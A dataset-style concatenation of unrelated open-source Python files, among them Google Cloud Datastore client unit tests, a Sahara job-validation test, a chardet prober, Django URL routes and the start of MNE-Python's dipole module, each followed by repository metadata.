side_effect=[lookup_response1, lookup_response2], spec=[]
)
client._datastore_api_internal = ds_api
missing = []
found = client.get_multi([key1, key2], missing=missing)
self.assertEqual(len(found), 2)
self.assertEqual(len(missing), 0)
# Check the actual contents on the response.
self.assertIsInstance(found[0], Entity)
self.assertEqual(found[0].key.path, key1.path)
self.assertEqual(found[0].key.project, key1.project)
self.assertIsInstance(found[1], Entity)
self.assertEqual(found[1].key.path, key2.path)
self.assertEqual(found[1].key.project, key2.project)
self.assertEqual(ds_api.lookup.call_count, 2)
read_options = datastore_pb2.ReadOptions()
ds_api.lookup.assert_any_call(
self.PROJECT, [key2_pb], read_options=read_options
)
ds_api.lookup.assert_any_call(
self.PROJECT, [key1_pb, key2_pb], read_options=read_options
)
def test_get_multi_hit(self):
from google.cloud.datastore_v1.proto import datastore_pb2
from google.cloud.datastore.key import Key
kind = "Kind"
id_ = 1234
path = [{"kind": kind, "id": id_}]
# Make a found entity pb to be returned from mock backend.
entity_pb = _make_entity_pb(self.PROJECT, kind, id_, "foo", "Foo")
# Make a connection to return the entity pb.
creds = _make_credentials()
client = self._make_one(credentials=creds)
lookup_response = _make_lookup_response(results=[entity_pb])
ds_api = _make_datastore_api(lookup_response=lookup_response)
client._datastore_api_internal = ds_api
key = Key(kind, id_, project=self.PROJECT)
result, = client.get_multi([key])
new_key = result.key
# Check the returned value is as expected.
self.assertIsNot(new_key, key)
self.assertEqual(new_key.project, self.PROJECT)
self.assertEqual(new_key.path, path)
self.assertEqual(list(result), ["foo"])
self.assertEqual(result["foo"], "Foo")
read_options = datastore_pb2.ReadOptions()
ds_api.lookup.assert_called_once_with(
self.PROJECT, [key.to_protobuf()], read_options=read_options
)
def test_get_multi_hit_w_transaction(self):
from google.cloud.datastore_v1.proto import datastore_pb2
from google.cloud.datastore.key import Key
txn_id = b"123"
kind = "Kind"
id_ = 1234
path = [{"kind": kind, "id": id_}]
# Make a found entity pb to be returned from mock backend.
entity_pb = _make_entity_pb(self.PROJECT, kind, id_, "foo", "Foo")
# Make a connection to return the entity pb.
creds = _make_credentials()
client = self._make_one(credentials=creds)
lookup_response = _make_lookup_response(results=[entity_pb])
ds_api = _make_datastore_api(lookup_response=lookup_response)
client._datastore_api_internal = ds_api
key = Key(kind, id_, project=self.PROJECT)
txn = client.transaction()
txn._id = txn_id
result, = client.get_multi([key], transaction=txn)
new_key = result.key
# Check the returned value is as expected.
self.assertIsNot(new_key, key)
self.assertEqual(new_key.project, self.PROJECT)
self.assertEqual(new_key.path, path)
self.assertEqual(list(result), ["foo"])
self.assertEqual(result["foo"], "Foo")
read_options = datastore_pb2.ReadOptions(transaction=txn_id)
ds_api.lookup.assert_called_once_with(
self.PROJECT, [key.to_protobuf()], read_options=read_options
)
def test_get_multi_hit_multiple_keys_same_project(self):
from google.cloud.datastore_v1.proto import datastore_pb2
from google.cloud.datastore.key import Key
kind = "Kind"
id1 = 1234
id2 = 2345
# Make a found entity pb to be returned from mock backend.
entity_pb1 = _make_entity_pb(self.PROJECT, kind, id1)
entity_pb2 = _make_entity_pb(self.PROJECT, kind, id2)
# Make a connection to return the entity pbs.
creds = _make_credentials()
client = self._make_one(credentials=creds)
lookup_response = _make_lookup_response(results=[entity_pb1, entity_pb2])
ds_api = _make_datastore_api(lookup_response=lookup_response)
client._datastore_api_internal = ds_api
key1 = Key(kind, id1, project=self.PROJECT)
key2 = Key(kind, id2, project=self.PROJECT)
retrieved1, retrieved2 = client.get_multi([key1, key2])
# Check values match.
self.assertEqual(retrieved1.key.path, key1.path)
self.assertEqual(dict(retrieved1), {})
self.assertEqual(retrieved2.key.path, key2.path)
self.assertEqual(dict(retrieved2), {})
read_options = datastore_pb2.ReadOptions()
ds_api.lookup.assert_called_once_with(
self.PROJECT,
[key1.to_protobuf(), key2.to_protobuf()],
read_options=read_options,
)
def test_get_multi_hit_multiple_keys_different_project(self):
from google.cloud.datastore.key import Key
PROJECT1 = "PROJECT"
PROJECT2 = "PROJECT-ALT"
# Make sure our IDs are actually different.
self.assertNotEqual(PROJECT1, PROJECT2)
key1 = Key("KIND", 1234, project=PROJECT1)
key2 = Key("KIND", 1234, project=PROJECT2)
creds = _make_credentials()
client = self._make_one(credentials=creds)
with self.assertRaises(ValueError):
client.get_multi([key1, key2])
def test_get_multi_max_loops(self):
from google.cloud.datastore.key import Key
kind = "Kind"
id_ = 1234
# Make a found entity pb to be returned from mock backend.
entity_pb = _make_entity_pb(self.PROJECT, kind, id_, "foo", "Foo")
# Make a connection to return the entity pb.
creds = _make_credentials()
client = self._make_one(credentials=creds)
lookup_response = _make_lookup_response(results=[entity_pb])
ds_api = _make_datastore_api(lookup_response=lookup_response)
client._datastore_api_internal = ds_api
key = Key(kind, id_, project=self.PROJECT)
deferred = []
missing = []
patch = mock.patch("google.cloud.datastore.client._MAX_LOOPS", new=-1)
with patch:
result = client.get_multi([key], missing=missing, deferred=deferred)
# Make sure we have no results, even though the connection has been
# set up as in `test_hit` to return a single result.
self.assertEqual(result, [])
self.assertEqual(missing, [])
self.assertEqual(deferred, [])
ds_api.lookup.assert_not_called()
def test_put(self):
_called_with = []
def _put_multi(*args, **kw):
_called_with.append((args, kw))
creds = _make_credentials()
client = self._make_one(credentials=creds)
client.put_multi = _put_multi
entity = object()
client.put(entity)
self.assertEqual(_called_with[0][0], ())
self.assertEqual(_called_with[0][1]["entities"], [entity])
def test_put_multi_no_entities(self):
creds = _make_credentials()
client = self._make_one(credentials=creds)
self.assertIsNone(client.put_multi([]))
def test_put_multi_w_single_empty_entity(self):
# https://github.com/GoogleCloudPlatform/google-cloud-python/issues/649
from google.cloud.datastore.entity import Entity
creds = _make_credentials()
client = self._make_one(credentials=creds)
self.assertRaises(ValueError, client.put_multi, Entity())
def test_put_multi_no_batch_w_partial_key(self):
from google.cloud.datastore_v1.proto import datastore_pb2
from google.cloud.datastore.helpers import _property_tuples
entity = _Entity(foo=u"bar")
key = entity.key = _Key(self.PROJECT)
key._id = None
creds = _make_credentials()
client = self._make_one(credentials=creds)
key_pb = _make_key(234)
ds_api = _make_datastore_api(key_pb)
client._datastore_api_internal = ds_api
result = client.put_multi([entity])
self.assertIsNone(result)
self.assertEqual(ds_api.commit.call_count, 1)
_, positional, keyword = ds_api.commit.mock_calls[0]
self.assertEqual(keyword, {"transaction": None})
self.assertEqual(len(positional), 3)
self.assertEqual(positional[0], self.PROJECT)
self.assertEqual(positional[1], datastore_pb2.CommitRequest.NON_TRANSACTIONAL)
mutations = positional[2]
mutated_entity = _mutated_pb(self, mutations, "insert")
self.assertEqual(mutated_entity.key, key.to_protobuf())
prop_list = list(_property_tuples(mutated_entity))
        self.assertEqual(len(prop_list), 1)
name, value_pb = prop_list[0]
self.assertEqual(name, "foo")
self.assertEqual(value_pb.string_value, u"bar")
def test_put_multi_existing_batch_w_completed_key(self):
from google.cloud.datastore.helpers import _property_tuples
creds = _make_credentials()
client = self._make_one(credentials=creds)
entity = _Entity(foo=u"bar")
key = entity.key = _Key(self.PROJECT)
with _NoCommitBatch(client) as CURR_BATCH:
result = client.put_multi([entity])
self.assertIsNone(result)
mutated_entity = _mutated_pb(self, CURR_BATCH.mutations, "upsert")
self.assertEqual(mutated_entity.key, key.to_protobuf())
prop_list = list(_property_tuples(mutated_entity))
        self.assertEqual(len(prop_list), 1)
name, value_pb = prop_list[0]
self.assertEqual(name, "foo")
self.assertEqual(value_pb.string_value, u"bar")
def test_delete(self):
_called_with = []
def _delete_multi(*args, **kw):
_called_with.append((args, kw))
creds = _make_credentials()
client = self._make_one(credentials=creds)
client.delete_multi = _delete_multi
key = object()
client.delete(key)
self.assertEqual(_called_with[0][0], ())
self.assertEqual(_called_with[0][1]["keys"], [key])
def test_delete_multi_no_keys(self):
creds = _make_credentials()
client = self._make_one(credentials=creds)
client._datastore_api_internal = _make_datastore_api()
result = client.delete_multi([])
self.assertIsNone(result)
client._datastore_api_internal.commit.assert_not_called()
def test_delete_multi_no_batch(self):
from google.cloud.datastore_v1.proto import datastore_pb2
key = _Key(self.PROJECT)
creds = _make_credentials()
client = self._make_one(credentials=creds)
ds_api = _make_datastore_api()
client._datastore_api_internal = ds_api
result = client.delete_multi([key])
self.assertIsNone(result)
self.assertEqual(ds_api.commit.call_count, 1)
_, positional, keyword = ds_api.commit.mock_calls[0]
self.assertEqual(keyword, {"transaction": None})
self.assertEqual(len(positional), 3)
self.assertEqual(positional[0], self.PROJECT)
self.assertEqual(positional[1], datastore_pb2.CommitRequest.NON_TRANSACTIONAL)
mutations = positional[2]
mutated_key = _mutated_pb(self, mutations, "delete")
self.assertEqual(mutated_key, key.to_protobuf())
def test_delete_multi_w_existing_batch(self):
creds = _make_credentials()
client = self._make_one(credentials=creds)
client._datastore_api_internal = _make_datastore_api()
key = _Key(self.PROJECT)
with _NoCommitBatch(client) as CURR_BATCH:
result = client.delete_multi([key])
self.assertIsNone(result)
mutated_key = _mutated_pb(self, CURR_BATCH.mutations, "delete")
self.assertEqual(mutated_key, key._key)
client._datastore_api_internal.commit.assert_not_called()
def test_delete_multi_w_existing_transaction(self):
creds = _make_credentials()
client = self._make_one(credentials=creds)
client._datastore_api_internal = _make_datastore_api()
key = _Key(self.PROJECT)
with _NoCommitTransaction(client) as CURR_XACT:
result = client.delete_multi([key])
self.assertIsNone(result)
mutated_key = _mutated_pb(self, CURR_XACT.mutations, "delete")
self.assertEqual(mutated_key, key._key)
client._datastore_api_internal.commit.assert_not_called()
def test_allocate_ids_w_partial_key(self):
num_ids = 2
incomplete_key = _Key(self.PROJECT)
incomplete_key._id = None
creds = _make_credentials()
client = self._make_one(credentials=creds, _use_grpc=False)
allocated = mock.Mock(keys=[_KeyPB(i) for i in range(num_ids)], spec=["keys"])
alloc_ids = mock.Mock(return_value=allocated, spec=[])
ds_api = mock.Mock(allocate_ids=alloc_ids, spec=["allocate_ids"])
client._datastore_api_internal = ds_api
result = client.allocate_ids(incomplete_key, num_ids)
# Check the IDs returned.
self.assertEqual([key._id for key in result], list(range(num_ids)))
def test_allocate_ids_w_completed_key(self):
creds = _make_credentials()
client = self._make_one(credentials=creds)
complete_key = _Key(self.PROJECT)
self.assertRaises(ValueError, client.allocate_ids, complete_key, 2)
def test_reserve_ids_w_completed_key(self):
num_ids = 2
creds = _make_credentials()
client = self._make_one(credentials=creds, _use_grpc=False)
complete_key = _Key(self.PROJECT)
reserve_ids = mock.Mock()
ds_api = mock.Mock(reserve_ids=reserve_ids, spec=["reserve_ids"])
client._datastore_api_internal = ds_api
        self.assertFalse(complete_key.is_partial)
client.reserve_ids(complete_key, num_ids)
expected_keys = [complete_key.to_protobuf()] * num_ids
reserve_ids.assert_called_once_with(self.PROJECT, expected_keys)
def test_reserve_ids_w_partial_key(self):
num_ids = 2
incomplete_key = _Key(self.PROJECT)
incomplete_key._id = None
creds = _make_credentials()
client = self._make_one(credentials=creds)
with self.assertRaises(ValueError):
client.reserve_ids(incomplete_key, num_ids)
def test_reserve_ids_w_wrong_num_ids(self):
num_ids = "2"
complete_key = _Key(self.PROJECT)
creds = _make_credentials()
client = self._make_one(credentials=creds)
with self.assertRaises(ValueError):
client.reserve_ids(complete_key, num_ids)
def test_key_w_project(self):
KIND = "KIND"
ID = 1234
creds = _make_credentials()
client = self._make_one(credentials=creds)
self.assertRaises(TypeError, client.key, KIND, ID, project=self.PROJECT)
def test_key_wo_project(self):
kind = "KIND"
id_ = 1234
creds = _make_credentials()
client = self._make_one(credentials=creds)
patch = mock.patch("google.cloud.datastore.client.Key", spec=["__call__"])
with patch as mock_klass:
key = client.key(kind, id_)
self.assertIs(key, mock_klass.return_value)
mock_klass.assert_called_once_with(
kind, id_, project=self.PROJECT, namespace=None
)
def test_key_w_namespace(self):
kind = "KIND"
id_ = 1234
namespace = object()
creds = _make_credentials()
client = self._make_one(namespace=namespace, credentials=creds)
patch = mock.patch("google.cloud.datastore.client.Key", spec=["__call__"])
with patch as mock_klass:
key = client.key(kind, id_)
self.assertIs(key, mock_klass.return_value)
mock_klass.assert_called_once_with(
kind, id_, project=self.PROJECT, namespace=namespace
)
def test_key_w_namespace_collision(self):
kind = "KIND"
id_ = 1234
namespace1 = object()
namespace2 = object()
creds = _make_credentials()
client = self._make_one(namespace=namespace1, credentials=creds)
patch = mock.patch("google.cloud.datastore.client.Key", spec=["__call__"])
with patch as mock_klass:
key = client.key(kind, id_, namespace=namespace2)
self.assertIs(key, mock_klass.return_value)
mock_klass.assert_called_once_with(
kind, id_, project=self.PROJECT, namespace=namespace2
)
def test_batch(self):
creds = _make_credentials()
client = self._make_one(credentials=creds)
patch = mock.patch("google.cloud.datastore.client.Batch", spec=["__call__"])
with patch as mock_klass:
batch = client.batch()
self.assertIs(batch, mock_klass.return_value)
mock_klass.assert_called_once_with(client)
def test_transaction_defaults(self):
creds = _make_credentials()
client = self._make_one(credentials=creds)
patch = mock.patch(
"google.cloud.datastore.client.Transaction", spec=["__call__"]
)
with patch as mock_klass:
xact = client.transaction()
self.assertIs(xact, mock_klass.return_value)
mock_klass.assert_called_once_with(client)
def test_read_only_transaction_defaults(self):
from google.cloud.datastore_v1.types import TransactionOptions
creds = _make_credentials()
client = self._make_one(credentials=creds)
xact = client.transaction(read_only=True)
self.assertEqual(
xact._options, TransactionOptions(read_only=TransactionOptions.ReadOnly())
)
self.assertFalse(xact._options.HasField("read_write"))
self.assertTrue(xact._options.HasField("read_only"))
self.assertEqual(xact._options.read_only, TransactionOptions.ReadOnly())
def test_query_w_client(self):
KIND = "KIND"
creds = _make_credentials()
client = self._make_one(credentials=creds)
other = self._make_one(credentials=_make_credentials())
self.assertRaises(TypeError, client.query, kind=KIND, client=other)
def test_query_w_project(self):
KIND = "KIND"
creds = _make_credentials()
client = self._make_one(credentials=creds)
self.assertRaises(TypeError, client.query, kind=KIND, project=self.PROJECT)
def test_query_w_defaults(self):
creds = _make_credentials()
client = self._make_one(credentials=creds)
patch = mock.patch("google.cloud.datastore.client.Query", spec=["__call__"])
with patch as mock_klass:
query = client.query()
self.assertIs(query, mock_klass.return_value)
mock_klass.assert_called_once_with(
client, project=self.PROJECT, namespace=None
)
def test_query_explicit(self):
kind = "KIND"
namespace = "NAMESPACE"
ancestor = object()
filters = [("PROPERTY", "==", "VALUE")]
projection = ["__key__"]
order = ["PROPERTY"]
distinct_on = ["DISTINCT_ON"]
creds = _make_credentials()
client = self._make_one(credentials=creds)
patch = mock.patch("google.cloud.datastore.client.Query", spec=["__call__"])
with patch as mock_klass:
query = client.query(
kind=kind,
namespace=namespace,
ancestor=ancestor,
filters=filters,
projection=projection,
order=order,
distinct_on=distinct_on,
)
self.assertIs(query, mock_klass.return_value)
mock_klass.assert_called_once_with(
client,
project=self.PROJECT,
kind=kind,
namespace=namespace,
ancestor=ancestor,
filters=filters,
projection=projection,
order=order,
distinct_on=distinct_on,
)
def test_query_w_namespace(self):
kind = "KIND"
namespace = object()
creds = _make_credentials()
client = self._make_one(namespace=namespace, credentials=creds)
patch = mock.patch("google.cloud.datastore.client.Query", spec=["__call__"])
with patch as mock_klass:
query = client.query(kind=kind)
self.assertIs(query, mock_klass.return_value)
mock_klass.assert_called_once_with(
client, project=self.PROJECT, namespace=namespace, kind=kind
)
def test_query_w_namespace_collision(self):
kind = "KIND"
namespace1 = object()
namespace2 = object()
creds = _make_credentials()
client = self._make_one(namespace=namespace1, credentials=creds)
patch = mock.patch("google.cloud.datastore.client.Query", spec=["__call__"])
with patch as mock_klass:
query = client.query(kind=kind, namespace=namespace2)
self.assertIs(query, mock_klass.return_value)
mock_klass.assert_called_once_with(
client, project=self.PROJECT, namespace=namespace2, kind=kind
)
class _NoCommitBatch(object):
def __init__(self, client):
from google.cloud.datastore.batch import Batch
self._client = client
self._batch = Batch(client)
self._batch.begin()
def __enter__(self):
self._client._push_batch(self._batch)
return self._batch
def __exit__(self, *args):
self._client._pop_batch()
class _NoCommitTransaction(object):
def __init__(self, client, transaction_id="TRANSACTION"):
from google.cloud.datastore.batch import Batch
from google.cloud.datastore.transaction import Transaction
self._client = client
xact = self._transaction = Transaction(client)
xact._id = transaction_id
Batch.begin(xact)
def __enter__(self):
self._client._push_batch(self._transaction)
return self._transaction
def __exit__(self, *args):
self._client._pop_batch()
class _Entity(dict):
key = None
exclude_from_indexes = ()
_meanings = {}
class _Key(object):
_MARKER = object()
_kind = "KIND"
_key = "KEY"
_path = None
_id = 1234
_stored = None
def __init__(self, project):
self.project = project
@property
def is_partial(self):
return self._id is None
def to_protobuf(self):
from google.cloud.datastore_v1.proto import entity_pb2
key = self._key = entity_pb2.Key()
# Don't assign it, because it will just get ripped out
# key.partition_id.project_id = self.project
element = key.path.add()
element.kind = self._kind
if self._id is not None:
element.id = self._id
return key
def completed_key(self, new_id):
assert self.is_partial
new_key = self.__class__(self.project)
new_key._id = new_id
return new_key
class _PathElementPB(object):
def __init__(self, id_):
self.id = id_
class _KeyPB(object):
def __init__(self, id_):
self.path = [_PathElementPB(id_)]
def _assert_num_mutations(test_case, mutation_pb_list, num_mutations):
test_case.assertEqual(len(mutation_pb_list), num_mutations)
def _mutated_pb(test_case, mutation_pb_list, mutation_type):
# Make sure there is only one mutation.
_assert_num_mutations(test_case, mutation_pb_list, 1)
# We grab the only mutation.
mutated_pb = mutation_pb_list[0]
# Then check if it is the correct type.
test_case.assertEqual(mutated_pb.WhichOneof("operation"), mutation_type)
return getattr(mutated_pb, mutation_type)
def _make_key(id_):
from google.cloud.datastore_v1.proto import entity_pb2
key = entity_pb2.Key()
elem = key.path.add()
elem.id = id_
return key
def _make_commit_response(*keys):
from google.cloud.datastore_v1.proto import datastore_pb2
mutation_results = [datastore_pb2.MutationResult(key=key) for key in keys]
return datastore_pb2.CommitResponse(mutation_results=mutation_results)
def _make_lookup_response(results=(), missing=(), deferred=()):
entity_results_found = [
mock.Mock(entity=result, spec=["entity"]) for result in results
]
entity_results_missing = [
mock.Mock(entity=missing_entity, spec=["entity"]) for missing_entity in missing
]
return mock.Mock(
found=entity_results_found,
missing=entity_results_missing,
deferred=deferred,
spec=["found", "missing", "deferred"],
)
def _make_datastore_api(*keys, **kwargs):
commit_method = mock.Mock(return_value=_make_commit_response(*keys), spec=[])
lookup_response = kwargs.pop("lookup_response", _make_lookup_response())
lookup_method = mock.Mock(return_value=lookup_response, spec=[])
return mock.Mock(
commit=commit_method, lookup=lookup_method, spec=["commit", "lookup"]
)
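# Usage sketch, mirroring the tests above (e.g. test_get_multi_hit): these
# factories stub the low-level datastore API so client calls can be asserted
# without any network traffic; names like entity_pb and key refer to objects
# built in those tests.
#
#   lookup_response = _make_lookup_response(results=[entity_pb])
#   ds_api = _make_datastore_api(lookup_response=lookup_response)
#   client._datastore_api_internal = ds_api
#   found, = client.get_multi([key])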
|
tseaver/google-cloud-python
|
datastore/tests/unit/test_client.py
|
Python
|
apache-2.0
| 44,363
| 0.000654
|
#!/usr/bin/env python
import pickle
import argparse
from pprint import pprint
description = """
print out run status from pickled Location object
"""
parser = argparse.ArgumentParser(description=description)
# pickle files must be read in binary mode
parser.add_argument('pickle', type=argparse.FileType('rb'), help='path to location pickle')
args = parser.parse_args()
l = pickle.load(args.pickle)
pprint(l)
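# Example invocation (the path is illustrative only; the pickle is a Location
# object produced elsewhere by sleuth_automation):
#
#   python status.py /path/to/location.pickle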
|
sostenibilidad-unam/sleuth_automation
|
bin/status.py
|
Python
|
gpl-3.0
| 373
| 0.005362
|
# Copyright (c) 2013 Red Hat Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import uuid
import mock
import six
from sahara.service.validations.edp import job_executor as je
from sahara.tests.unit.service.validation import utils as u
from sahara.utils import edp
def wrap_it(data):
je.check_job_executor(data, 0)
class FakeJob(object):
type = edp.JOB_TYPE_JAVA
libs = []
class TestJobExecJavaValidation(u.ValidationTestCase):
def setUp(self):
super(TestJobExecJavaValidation, self).setUp()
self._create_object_fun = wrap_it
self.scheme = je.JOB_EXEC_SCHEMA
@mock.patch('sahara.service.validations.base.check_edp_job_support')
@mock.patch('sahara.service.validations.base.check_cluster_exists')
@mock.patch('sahara.service.edp.api.get_job')
def test_java(self, get_job, check_cluster, check_oozie):
check_cluster.return_value = True
check_oozie.return_value = None
get_job.return_value = FakeJob()
self._assert_create_object_validation(
data={
"cluster_id": six.text_type(uuid.uuid4()),
"job_configs": {"configs": {},
"params": {},
"args": []}
},
bad_req_i=(1, "INVALID_DATA",
"Java job must "
"specify edp.java.main_class"))
self._assert_create_object_validation(
data={
"cluster_id": six.text_type(uuid.uuid4()),
"job_configs": {
"configs": {
"edp.java.main_class": "org.me.myclass"},
"params": {},
"args": []}
})
|
tellesnobrega/storm_plugin
|
sahara/tests/unit/service/validation/edp/test_job_executor_java.py
|
Python
|
apache-2.0
| 2,252
| 0
|
# ####################### BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Universal charset detector code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 2001
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
# Shy Shalom - original C code
# Proofpoint, Inc.
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
import sys
from . import constants
from .charsetprober import CharSetProber
class MultiByteCharSetProber(CharSetProber):
def __init__(self):
CharSetProber.__init__(self)
self._mDistributionAnalyzer = None
self._mCodingSM = None
self._mLastChar = [0, 0]
def reset(self):
CharSetProber.reset(self)
if self._mCodingSM:
self._mCodingSM.reset()
if self._mDistributionAnalyzer:
self._mDistributionAnalyzer.reset()
self._mLastChar = [0, 0]
def get_charset_name(self):
pass
def feed(self, aBuf):
aLen = len(aBuf)
for i in range(0, aLen):
codingState = self._mCodingSM.next_state(aBuf[i])
if codingState == constants.eError:
if constants._debug:
sys.stderr.write(self.get_charset_name()
+ ' prober hit error at byte ' + str(i)
+ '\n')
self._mState = constants.eNotMe
break
elif codingState == constants.eItsMe:
self._mState = constants.eFoundIt
break
elif codingState == constants.eStart:
charLen = self._mCodingSM.get_current_charlen()
if i == 0:
self._mLastChar[1] = aBuf[0]
self._mDistributionAnalyzer.feed(self._mLastChar, charLen)
else:
self._mDistributionAnalyzer.feed(aBuf[i - 1:i + 1],
charLen)
self._mLastChar[0] = aBuf[aLen - 1]
if self.get_state() == constants.eDetecting:
if (self._mDistributionAnalyzer.got_enough_data() and
(self.get_confidence() > constants.SHORTCUT_THRESHOLD)):
self._mState = constants.eFoundIt
return self.get_state()
def get_confidence(self):
return self._mDistributionAnalyzer.get_confidence()
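# Sketch of the intended subclass pattern (the names below are illustrative,
# not part of this module): concrete probers plug in a coding state machine
# and a character distribution analyzer, then inherit feed()/get_confidence()
# unchanged.
#
#   class ExampleProber(MultiByteCharSetProber):
#       def __init__(self):
#           MultiByteCharSetProber.__init__(self)
#           self._mCodingSM = SomeCodingStateMachine()          # hypothetical
#           self._mDistributionAnalyzer = SomeDistributionAnalysis()
#           self.reset()
#
#       def get_charset_name(self):
#           return "EXAMPLE-CHARSET"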
|
insiderr/insiderr-app
|
app/modules/requests/packages/chardet/mbcharsetprober.py
|
Python
|
gpl-3.0
| 3,269
| 0.000306
|
from django.conf.urls import url
from . import views
app_name = 'revisions'
urlpatterns = [
url(r'^revision/$', views.RevisionView.as_view(), name = 'revision'),
url(r'^mail/$', views.MailView.as_view(), name = 'mail'),
]
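# Usage sketch (assumes these patterns are included under the 'revisions'
# namespace declared by app_name above; the final URL prefix depends on the
# project URLconf):
#
#   from django.urls import reverse
#   reverse('revisions:revision')   # resolves to RevisionView
#   reverse('revisions:mail')       # resolves to MailView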
|
pelgoros/kwyjibo
|
revisions/urls.py
|
Python
|
gpl-3.0
| 232
| 0.017241
|
# -*- coding: utf-8 -*-
"""Single-dipole functions and classes."""
# Authors: Alexandre Gramfort <alexandre.gramfort@inria.fr>
# Eric Larson <larson.eric.d@gmail.com>
#
# License: Simplified BSD
from copy import deepcopy
import functools
from functools import partial
import re
import numpy as np
from .cov import read_cov, compute_whitener
from .io.constants import FIFF
from .io.pick import pick_types
from .io.proj import make_projector, _needs_eeg_average_ref_proj
from .bem import _fit_sphere
from .evoked import _read_evoked, _aspect_rev, _write_evokeds
from .transforms import _print_coord_trans, _coord_frame_name, apply_trans
from .viz.evoked import _plot_evoked
from .forward._make_forward import (_get_trans, _setup_bem,
_prep_meg_channels, _prep_eeg_channels)
from .forward._compute_forward import (_compute_forwards_meeg,
_prep_field_computation)
from .surface import (transform_surface_to, _compute_nearest,
_points_outside_surface)
from .bem import _bem_find_surface, _bem_surf_name
from .source_space import _make_volume_source_space, SourceSpaces, head_to_mni
from .parallel import parallel_func
from .utils import (logger, verbose, _time_mask, warn, _check_fname,
check_fname, _pl, fill_doc, _check_option, ShiftTimeMixin,
_svd_lwork, _repeated_svd, _get_blas_funcs)
@fill_doc
class Dipole(object):
u"""Dipole class for sequential dipole fits.
.. note:: This class should usually not be instantiated directly,
instead :func:`mne.read_dipole` should be used.
Used to store positions, orientations, amplitudes, times, goodness of fit
of dipoles, typically obtained with Neuromag/xfit, mne_dipole_fit
or certain inverse solvers. Note that dipole position vectors are given in
the head coordinate frame.
Parameters
----------
times : array, shape (n_dipoles,)
The time instants at which each dipole was fitted (sec).
pos : array, shape (n_dipoles, 3)
The dipoles positions (m) in head coordinates.
amplitude : array, shape (n_dipoles,)
The amplitude of the dipoles (Am).
ori : array, shape (n_dipoles, 3)
The dipole orientations (normalized to unit length).
gof : array, shape (n_dipoles,)
The goodness of fit.
name : str | None
Name of the dipole.
conf : dict
Confidence limits in dipole orientation for "vol" in m^3 (volume),
"depth" in m (along the depth axis), "long" in m (longitudinal axis),
"trans" in m (transverse axis), "qlong" in Am, and "qtrans" in Am
(currents). The current confidence limit in the depth direction is
assumed to be zero (although it can be non-zero when a BEM is used).
.. versionadded:: 0.15
khi2 : array, shape (n_dipoles,)
The χ^2 values for the fits.
.. versionadded:: 0.15
nfree : array, shape (n_dipoles,)
The number of free parameters for each fit.
.. versionadded:: 0.15
%(verbose)s
See Also
--------
fit_dipole
DipoleFixed
read_dipole
Notes
-----
This class is for sequential dipole fits, where the position
changes as a function of time. For fixed dipole fits, where the
position is fixed as a function of time, use :class:`mne.DipoleFixed`.
"""
@verbose
def __init__(self, times, pos, amplitude, ori, gof,
name=None, conf=None, khi2=None, nfree=None,
verbose=None): # noqa: D102
self.times = np.array(times)
self.pos = np.array(pos)
self.amplitude = np.array(amplitude)
self.ori = np.array(ori)
self.gof = np.array(gof)
self.name = name
self.conf = dict()
if conf is not None:
for key, value in conf.items():
self.conf[key] = np.array(value)
self.khi2 = np.array(khi2) if khi2 is not None else None
self.nfree = np.array(nfree) if nfree is not None else None
self.verbose = verbose
def __repr__(self): # noqa: D105
s = "n_times : %s" % len(self.times)
s += ", tmin : %0.3f" % np.min(self.times)
s += ", tmax : %0.3f" % np.max(self.times)
return "<Dipole | %s>" % s
@verbose
def save(self, fname, overwrite=False, *, verbose=None):
"""Save dipole in a .dip or .bdip file.
Parameters
----------
fname : str
The name of the .dip or .bdip file.
%(overwrite)s
.. versionadded:: 0.20
%(verbose_meth)s
Notes
-----
.. versionchanged:: 0.20
Support for writing bdip (Xfit binary) files.
"""
# obligatory fields
fname = _check_fname(fname, overwrite=overwrite)
if fname.endswith('.bdip'):
_write_dipole_bdip(fname, self)
else:
_write_dipole_text(fname, self)
@fill_doc
def crop(self, tmin=None, tmax=None, include_tmax=True):
"""Crop data to a given time interval.
Parameters
----------
tmin : float | None
Start time of selection in seconds.
tmax : float | None
End time of selection in seconds.
%(include_tmax)s
Returns
-------
self : instance of Dipole
The cropped instance.
"""
sfreq = None
if len(self.times) > 1:
sfreq = 1. / np.median(np.diff(self.times))
mask = _time_mask(self.times, tmin, tmax, sfreq=sfreq,
include_tmax=include_tmax)
for attr in ('times', 'pos', 'gof', 'amplitude', 'ori',
'khi2', 'nfree'):
if getattr(self, attr) is not None:
setattr(self, attr, getattr(self, attr)[mask])
for key in self.conf.keys():
self.conf[key] = self.conf[key][mask]
return self
def copy(self):
"""Copy the Dipoles object.
Returns
-------
dip : instance of Dipole
The copied dipole instance.
"""
return deepcopy(self)
@verbose
def plot_locations(self, trans, subject, subjects_dir=None,
mode='orthoview', coord_frame='mri', idx='gof',
show_all=True, ax=None, block=False, show=True,
scale=5e-3, color=(1.0, 0.0, 0.0), fig=None,
verbose=None, title=None):
"""Plot dipole locations in 3d.
Parameters
----------
trans : dict
The mri to head trans.
subject : str
The subject name corresponding to FreeSurfer environment
variable SUBJECT.
%(subjects_dir)s
mode : str
Can be ``'arrow'``, ``'sphere'`` or ``'orthoview'``.
.. versionadded:: 0.14.0
coord_frame : str
Coordinate frame to use, 'head' or 'mri'. Defaults to 'mri'.
.. versionadded:: 0.14.0
idx : int | 'gof' | 'amplitude'
Index of the initially plotted dipole. Can also be 'gof' to plot
the dipole with highest goodness of fit value or 'amplitude' to
